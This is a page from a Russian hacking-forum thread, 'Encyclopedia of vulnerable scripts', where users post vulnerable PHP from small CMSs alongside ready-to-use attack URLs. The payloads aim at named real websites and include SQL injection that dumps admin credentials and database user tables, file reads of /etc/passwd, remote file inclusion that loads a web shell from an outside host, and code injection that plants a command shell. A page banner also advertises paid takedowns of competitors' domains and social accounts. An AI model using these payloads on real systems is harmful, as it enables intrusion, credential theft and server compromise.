Форум АНТИЧАТ - Энциклопедия уязвимых скриптов

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Энциклопедия уязвимых скриптов

Страница 29 из 41

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#281

24.12.2009, 14:57

m0Hze

Он хакер.

Регистрация: 01.11.2008

Сообщений: 1,756

Провел на форуме:
6462214

Репутация: 3171

Update: #244
Версия ядра обновилась.Целевая версия - 1.1.Как водиться,с обновлением, разработчики только прибавили дырок.

SQL-inj

File: downloads.php

PHP код:


		
			
if(isset($_GET['cat'])){

$result = mysql_query("SELECT * FROM xcms_downloads WHERE category=".$_GET['cat']." ORDER By id DESC") or die(mysql_error());  

    $content .=" <div class='post' id='post-8'> ";

    

            while($downloads = mysql_fetch_array( $result )) {

                $content .="

                    <table width='100%' cellpadding='0' cellspacing='1' class='tbl-border'> 

                    <tr> 

                    <td colspan='3' class='tbl2'><strong><a href='".DOWNLOADS.$downloads['file']."'>".$downloads['name']."</a></strong>

                    </td> 

                    <tr> 

                    <td colspan='3' class='tbl1'>".$downloads['description']."</td> 

                    </tr> 

                    <tr> 

                    <td width='30%' class='tbl2'><strong>Added:</strong> ".$downloads['uploaded']."</td> 

                    <td width='30%' class='tbl1'><strong>Uploaded by:</strong><b><a href='".BASEDIR."profile.php?view=".$downloads['uploader']."'> ".$downloads['uploader']."</b></a></td> 

                    <td width='40%' class='tbl2'><b><a href='".$_SERVER['PHP_SELF']."?download=".$downloads['id']."'>Download (".$downloads['downloaded'].")</a></b></td> 

                    </tr> 

                    </table><br>

                ";

            }

Target: Сайт разработчика:
http://sphere.xlentprojects.se/downloads.php?cat=1+union+select+1,id,3,4,username ,password,7,8,9+from+xcms_members+--+
Логинимся - мы администраторы.Не будем ничеготрогать,мы же не хокеры

Пропустим мимо глаз то,что уязвимы 70% всех файлов.В 1 вывод лучше всего,на нем и остановимся.

не надо логин-пароль писать

Последний раз редактировалось HAXTA4OK; 24.12.2009 в 15:11..

#282

26.12.2009, 01:39

m0Hze

Он хакер.

Регистрация: 01.11.2008

Сообщений: 1,756

Провел на форуме:
6462214

Репутация: 3171

Update! Post: #127

RFI

Need: register_globals = ON allow_url_include = ON

File: /BLOX/scripts/editPageParams.php
раньше была скуля,теперь там rfi

PHP код:


		
			
if (!$GLOBALS['user']['userIsAdmin'])

    return;

QS($K, $B, $terms);

function QS($K, $B, $terms)

{

    require_once $GLOBALS['bloxDir'] . "/functions/getPageParams.php";

    if (empty($_SESSION['page']))

        $pageId = $_GET['page'];

    else

        $pageId = $_SESSION['page'];

    $pageParams = WA($pageId);

    require_once $GLOBALS['bloxDir'] . "/functions/Proposition.php";

    $H = new S('pageIsHidden', $pageId);

    $pageParams['pageIsHidden'] = $H->O();

    $H = new S('parentPageIsAdopted', $pageId);

    if ($H->O()) {

        $pageParams['parentPageIsAdopted'] = true;

        $_SESSION['parentPageIsAdopted'] = true;

    }

    $B->C('pageParams', $pageParams);

    include $GLOBALS['bloxDir'] . "/includes/submitButtons.php";

    include $GLOBALS['bloxDir'] . "/includes/display.php";

} ?>

Target: ?user[userIsAdmin]=1&bloxDir=http://yousite.com/wso2.php?

File: /BLOX/script/chek.php

PHP код:


		
			
if (!$GLOBALS['user']['userIsAdmin'])

    return;

LW($K, $B, $terms);

function LW($K, $B, $terms)

{

    require_once $GLOBALS['bloxDir'] . "/functions/getBlockParams.php";

...

Target: ?user[userIsAdmin]=1&bloxDir=http://yousite.com/wso2.php?

#283

28.12.2009, 05:55

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

Продукт: CMS-DIYAN CMS без MySQL
Скачать : http://cms-diyan.ru/index.php?file=download
ось: WIN

LFI:
линки:
http://dyian/index.php?file=\..\user\1.txt
http://dyian/index.php?file=\..\user\1.txt&news

PHP код:


		
			
include_once('php/function.php');





if (!isset($_GET["file"])){

$ret=vizov_file("index");

}



if (isset($_GET["file"])){

$file=$_GET["file"];



if (!ereg('^[^./][^/]*$', $file)) die("сработала защита от взлома!");





$ret=vizov_file($file);

}

PHP код:


		
			
function vizov_file($file)

{

$filedir="files/".$file;

if (isset($_GET['news']))$filedir="news/".$file;

if (file_exists($filedir)){

if ((isset($_GET["dlyadruzey"]))&&(@fopen("http://cms-diyan.ru/dlyadruzey/".$_GET["dlyadruzey"], "r")))$filedir="http://cms-diyan.ru/dlyadruzey/".$_GET["dlyadruzey"];



if (!file_exists($filedir))die('Не найден файл '.$filedir);

$handle = fopen($filedir, "r");

            $ret[4] = ''; $i=0;

            while (!feof($handle)) {

                $buffer = fgets($handle, 4096);

                  if($i==0) $ret[0]=$buffer;

                  elseif($i==1) $ret[1]=$buffer;

                  elseif($i==2) $ret[2]=$buffer;

                  elseif($i==3) $ret[3]=$buffer;

                else $ret[4].=$buffer;

              $i++;

            }



            fclose($handle);

Последний раз редактировалось Strilo4ka; 28.12.2009 в 14:08..

#284

28.12.2009, 22:02

nikp

Reservists Of Antichat - Level 6

Регистрация: 19.09.2008

Сообщений: 127

Провел на форуме:
835386

Репутация: 1463

Magazin IT online (Design & Development by Twenty Advertising)
http://www.accessdatamedia.ro
SQL

stiri.php

PHP код:


		
			
if(isset($_GET['id']) && ($_GET['id']!=""))

{

    $where=' WHERE `news`.`id_news`='.$_GET['id'];

}

mysql_select_db($database_conn, $conn);

$query_news = "SELECT * FROM news ".$where;

http://www.accessdatamedia.ro/stiri.php?id=-100+union+all+select+1,concat_ws(0x203a20,version( ),user(),host,user,password,file_priv),3,4+from+my sql.user+--+

certificare.php

PHP код:


		
			
$query_news = "SELECT * FROM `certifications` where id_certification=".stripslashes($_GET['id']);

http://www.accessdatamedia.ro/certificare.php?id=-3+union+select+1,2,load_file(0x2f6574632f706173737 764),4+--+

#285

28.12.2009, 23:04

nikp

Reservists Of Antichat - Level 6

Регистрация: 19.09.2008

Сообщений: 127

Провел на форуме:
835386

Репутация: 1463

BlognPlus
http://www.blogn.org/
SQL

index.php

PHP код:


		
			
case "e":

 $blogn_entry_id = @$_GET["e"];

 $blogn_skin = preg_replace("/\{SEARCH\}[\w\W]+?\{\/SEARCH\}/", "", $blogn_skin);

 $blogn_skin = preg_replace("/\{PROFILES\}[\w\W]+?\{\/PROFILES\}/", "", $blogn_skin);

 $blogn_skin = preg_replace("/\{COMMENTLIST\}[\w\W]+?\{\/COMMENTLIST\}/", "", $blogn_skin);

 $blogn_skin = preg_replace("/\{COMMENTNEW\}[\w\W]+?\{\/COMMENTNEW\}/", "", $blogn_skin);

 $blogn_skin = preg_replace("/\{TRACKBACKLIST\}[\w\W]+?\{\/TRACKBACKLIST\}/", "", $blogn_skin);

 $blogn_skin = preg_replace("/\{TRACKBACKNEW\}[\w\W]+?\{\/TRACKBACKNEW\}/", "", $blogn_skin);

 $blogn_skin = blogn_entry_view($blogn_user, $blogn_skin, $blogn_entry_id);

nikkiFuntions.php

PHP код:


		
			
function blogn_entry_view($user, $skin, $entry_id) {

    $skin = preg_replace("/\{LOG\}/", "", $skin);

    $skin = preg_replace("/\{LOG[ ]+([\w\W]+?)\}/", "", $skin);

    $skin = preg_replace("/\{\/LOG\}/", "", $skin);

    $nextbackurl = blogn_mod_db_log_nextback_url($user, $entry_id);

db_mysql.php

PHP код:


		
			
function blogn_mod_db_log_nextback_url($user, $key_id) {

    $sql_connect = @mysql_connect(BLOGN_DB_HOST.":".BLOGN_DB_PORT, BLOGN_DB_USER, BLOGN_DB_PASS);

    mysql_select_db(BLOGN_DB_NAME);



    $qry = "SELECT date FROM ".BLOGN_DB_PREFIX."_loglist WHERE id = ".$key_id;

http://hangulnikki.hanguk.jp/index.php?e=-100+union+select+1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd'),concat_ws(0x203a20,version(),user(),host, user,password,file_priv),13+from+mysql.user--

#286

29.12.2009, 00:00

m0Hze

Он хакер.

Регистрация: 01.11.2008

Сообщений: 1,756

Провел на форуме:
6462214

Репутация: 3171

Product: TinX CMS
Author: cms.tinx.dk
Version: 3.5.2

Need: magic_quotes_gpc = off register_globals=on

Remote Code Executing
File: /admin/actions.php

PHP код:


		
			
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["cmsadmin"])) {

    //echo "POST(".$_POST["cmsadmin"].")<br>";

    $defaultdocumentid = $_POST["defaultdocumentid"];

    $language = $_POST["language"];

    $appendToTitle = $_POST["appendToTitle"];

    $www = $_POST["www"];

    $theme = $_POST["theme"];

    $theme = $_POST["theme"];

    $template = $_POST["template"];

    $loginsystem = $_POST["loginsystem"];

    $companyName = $_POST["companyName"];

    $siteDesign = $_POST["siteDesign"];

    $searchresult_quickid = $_POST["searchresult_quickid"];

    $contact_quickid = $_POST["contact_quickid"];

    $sitemap_quickid = $_POST["sitemap_quickid"];

    $max_root_documents = $_POST["max_root_documents"];





    //phpinfo();



    $d = date("Y-m-d_h-i-s", time());

    exec("cp " . $system["DOCUMENT_ROOT"] . "/inc/customer_config.php " . $_SERVER["DOCUMENT_ROOT"] .

        "/inc/customer_config_$d.php");

    $cfile = $system["DOCUMENT_ROOT"] . "/inc/customer_config.php";



    $fh = fopen($cfile, 'w') or die("can't open file: No ACCESS TO FILE OR LIBRARY!!!!!");





    $write = <<< html

<?php

    /************************************************

        Settings that can be changed - TinX/cms

    *************************************************/

    \$appendToTitle = "$appendToTitle";

    \$companyName   = "$companyName";

    

    \$language = "$language";                             /* da = danish, en=english.... make some up */

    \$defaultdocumentid = "$defaultdocumentid";            /* If index.php is launched, this document id is called */

    \$searchresult_quickid = "$searchresult_quickid";    /* search page QuickID */

    \$contact_quickid = "$contact_quickid";                /* contact page QuickID */

    \$sitemap_quickid = "$sitemap_quickid";                /* sitemap page QuickID */

    \$max_root_documents = "$max_root_documents";        /* Max number of root elements in menu */

    

    \$www = "$www";        // Url til websitet

    \$theme["name"] = "$theme";

    

    \$antalStatus = 2;

    \$statusNames[0] = "Aktiv"; /* statusNames indeholder statuskoder for dokumentet - aktiv/inaktiv mv */

    \$statusNames[1] = "Inaktiv";



    /* Google Webmaster tools */

    \$googlesitemap_path = \$www . "/googlesitemap.xml";



    /* Show/Hide indtastningsfelter pе settings.php:

    Skal feltet skjules intastes en default vГ¦rdi, ellers "" */

    \$settings_options["documenttitle"] = "";

    \$settings_options["category"] = "Standard";

    \$settings_options["template"] = "$template";

    

    // LOGIN TYPE

    \$login_system = "$loginsystem"; //values: phpBB - TinX



    // Other settings

    \$siteDesign = "$siteDesign";

    \$siteDesignPath    = "designs/" . \$siteDesign;

    \$siteTemplatePath    = "designs/" . \$siteDesign ."/templates/";

    \$siteContainerPath    = "designs/" . \$siteDesign ."/containers/";    



    if (file_exists(\$system["DOCUMENT_ROOT"]."\$prefix/inc/customer_vars.php"))

        include(\$system["DOCUMENT_ROOT"]."\$prefix/inc/customer_vars.php");

    else

        echo "### ERROR: customer_vars.php NOT FOUND ###";

?>

html;



    fputs($fh, $write);

    fclose($fh);

Target: {POST} ?cmsadmin=1&appendToTitle=";system($_GET[cmd]);die();
http://yousite.com/inc/customer_config.php?cmd=dir

SQL-inj

File: /admin/actions.php

PHP код:


		
			
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["createobject"]) && $_POST["objectaction"]

    === "create") {

    $id = $_POST["docid"];

    $type = $_POST["objtype"];

    $title = $_POST["objtitle"];

    $location = $_POST["objlocation"];

    $container = $_POST["objcontainer"];

    $objlink = $_POST["objlink"];

    $is_copy_of = $_POST["objlinkSubCat"];



    if ($type == "existingContent" && $is_copy_of > 0) {

        $obj_table = $objlink;

        $type = mysql_fetch_array($sqlPtr->selectQuery("file", $tables["object_templates"],

            "tablename='$objlink'"));

        $type = $type[0];

        $insert_as_copy = true;

    } else {

        $insert_as_copy = false;

        $objlink = "";

        $is_copy_of = "0";



    }

$sqlPtr->selectQuery();

PHP код:


		
			
function selectQuery($what, $tablename, $where="", $other="")

    {

        //echo "Lookup: " . $this->antalLookups . "<br>";

        $this->antalLookups++;

//        $this->makeConnection();

        if(strcmp($where,"") != 0)

            $where = "WHERE $where";



        $q = "SELECT $what FROM $tablename $where $other";

//echo "Q($q)\n";

        if($this->isDebug){

            echo "Query($q)<br>\n";

            echo "HOST($this->dbhost)<br>\n";

            echo "USER($this->dbusername)<br>\n";

            echo "PASS($this->dbuserpassword)<br>\n";

            echo "DB($this->default_dbname)<br>\n";

        }

        $result= mysql_query($q);

        if(!$result)

            $this->error_message($this->sql_error()  . "<br><b>selectQuery($q) error</b>: $delete connected but not to table" );



//        $this->closeConnection();

        return $result;



    }

Target: {POST} ?objectaction=create&objectcreate=1&objlinkSubCat= 1&objtype=existingContent&objlink=1'+union+select+ 1,2,3,4,5/*

Последний раз редактировалось m0Hze; 29.12.2009 в 13:12..

Условие

#287

29.12.2009, 13:08

(Dm)

Reservists Of Antichat - Level 6

Регистрация: 08.04.2008

Сообщений: 286

Провел на форуме:
2375131

Репутация: 1695

Условие

Пишите пожалуйста условия работы уязвимости, такие как:

Цитата:

magic_quotes_gpc
register_globals
allow_url_include

и т.д

//HAXTA4OK

__________________
Cервер cs 1.6
cs.antichat.net:27015

Последний раз редактировалось HAXTA4OK; 29.12.2009 в 14:05..

#288

29.12.2009, 16:35

nikp

Reservists Of Antichat - Level 6

Регистрация: 19.09.2008

Сообщений: 127

Провел на форуме:
835386

Репутация: 1463

evil-grin.com

читалка
index.php

PHP код:


		
			
import_request_variables("gP", "_");

$n = $_n;

$b = $_b;

if($n==''){$n = 'index.html';}

$node = "/var/www/evil-grin.com/jargon/html/".$n;

if($b == 'entry'){$node = "/var/www/evil-grin.com/jargon/html/entry/".$n;}



function parse_jargon($file, $b, $n){

  $file = eregi_replace('\\\\', '', $file);

  $file = eregi_replace(' ', '+', $file);

  $pos = strpos($n, '/');

  if($pos){

       $pos++;

       $m = substr($n, 0, $pos);

  }

  if(file_exists($file)){

    $data = join ('', file ($file));

    $data = eregi_replace('<html.*<body*>', '', $data);

    $data = ereg_replace('src="html/graphics/', $data);

    $data = ereg_replace("href=\"", "href=\"index.php?b=$b&n=$m", $data);

    $data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "entry/", "href=\"index.php?b=entry&n=", $data);

    $data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "\.\./", "href=\"index.php?n=", $data);

    $data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "http", "href=\"http", $data);

    $data = ereg_replace("href=\"index.php\?b=$b&n=$m" . "mailto", "href=\"mailto", $data);

  }else{

    $data = "$file not found";

  }

  return $data;

}

http://evil-grin.com/jargon/index.php?n=../index.php

SQL
bmarks.php

PHP код:


		
			
import_request_variables("gP", "_");

$c = $_c;

$db = mysql_connect("localhost", "apache", "xyzzy");

mysql_select_db("evil",$db);

if($c == ""){

    $result = mysql_query("SELECT id, cat, notes from lnk_cat ORDER BY cat",$db);

    while ($myrow = mysql_fetch_row($result)) {

    $oput .= "<DT><B><A HREF=\"bmarks.php?c=$myrow[0]\" CLASS=\"led\">$myrow[1]</B></A>\n";

    $oput .= "<DD CLASS=\"text\">$myrow[2]\n";

    }

}else{

   $result = mysql_query("SELECT cat from lnk_cat WHERE id = $c",$db);

    $myrow = mysql_fetch_row($result);

    $cat = $myrow[0];

    $result = mysql_query("SELECT id, uri, txt, notes from links WHERE cat = $c ORDER BY txt",$db);

http://www.evil-grin.com/bmarks.php?c=-3+union+select+1,2,version(),load_file(0x2F6574632 F706173737764)+from+mysql.user--

#289

30.12.2009, 01:49

m0Hze

Он хакер.

Регистрация: 01.11.2008

Сообщений: 1,756

Провел на форуме:
6462214

Репутация: 3171

Product: SetCMS
Author: http://setcms.org
Version: 3.6.5

LFI

Need: magic_quotes_gpc = off;

File: index.php

PHP код:


		
			
if (file_exists("modules/$set/index.php")) {

    if (file_exists("modules/$set/config.php")) {

        include ("modules/$set/config.php");

    }

    include ("modules/$set/index.php");

Target: ?set=../rss.php%00

Последний раз редактировалось m0Hze; 30.12.2009 в 01:52..

#290

30.12.2009, 20:29

nikp

Reservists Of Antichat - Level 6

Регистрация: 19.09.2008

Сообщений: 127

Провел на форуме:
835386

Репутация: 1463

termassaojoao.com.br
Copyright: Andre Klunk - 2007 | Todos os direiros reservados

index.php

PHP код:


		
			
if($_GET[conteudo])

{

include("$_GET[conteudo]"); 

}

при allow_url_include = Off
LFI
http://www.termassaojoao.com.br/index.php?conteudo=php://filter/read=convert.base64-encode/resource=index.php

Последний раз редактировалось HAXTA4OK; 31.12.2009 в 10:42..

Страница 29 из 41

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Библиотека	SladerNon	Болталка	17	05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php	DIAgen	Авторские статьи	8	28.05.2006 12:30

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход